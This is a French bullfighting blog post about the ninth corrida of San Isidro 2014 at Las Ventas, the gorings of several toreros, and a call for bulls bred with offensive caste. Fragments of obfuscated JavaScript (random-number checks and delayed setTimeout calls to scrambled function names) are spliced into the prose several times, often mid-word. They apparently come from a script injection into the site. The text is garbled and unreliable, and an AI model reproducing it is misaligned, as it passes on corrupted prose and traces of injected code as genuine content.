FERIA DE SAN ISIDRO 2014. 20 MAI. NEUVIEME CORRIDA.TRAGEDIE A LAS VENTAS

Feria de San Isidro 2014. 20 mai.Neuvième corrida.Tragédie à Las Ventas.

C’est une évidence, les toros attrappent les toreros. Il est vrai aussi qu’il y a des coups de corne accidentels, comme celui de David Mora, parce que le toro sort aveuglé du toril quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and on l’appelle a porta gayola, et des coups de corne où c’est seulement le toro qui en est le coupable, comme pour celles d’Antonio Nazaré et de Jimenez Fortes, car dans ces deux cas le toro était toréé, aussi bien lors de la véronique réalisée par ce dernier comme pour la demie véronique de Nazaré. Dans les deux situations, le toro abandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andonne le leurre et cherche le corps du torero.

D’autre part ce n’est pas seulement le toro de Madrid, toujours très encorné et presque toujours avec plus de genio que de caste, celui qui blesse les toreros : on a vu des grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andes cornades, parfois mortelles, dans de toutes petites arènes. Cependant le moment est venu de réclamer un autre toro pour Madrid. Qui ne soit pas moins sérieux, ni manquant de trapio, mais fait pour charger, avec des défenses sérieuses et pas uniquement immenses –ce que les aficionados d’antan n’appréciaient guère- et, surtout, avec des fers avec une caste offensive et non pas avec ce mauvais génie défensif.

L’émotion la plus vraie du toreo reside dans la charge humiliée, jamais dans le coup de tête défensif, traître, propre du manso.

Il y eut tragédie à Las Ventas. Mais aussi deux toros qui paraissaient issus d’un nettoyage de corrals.

Les commentaires sont fermés.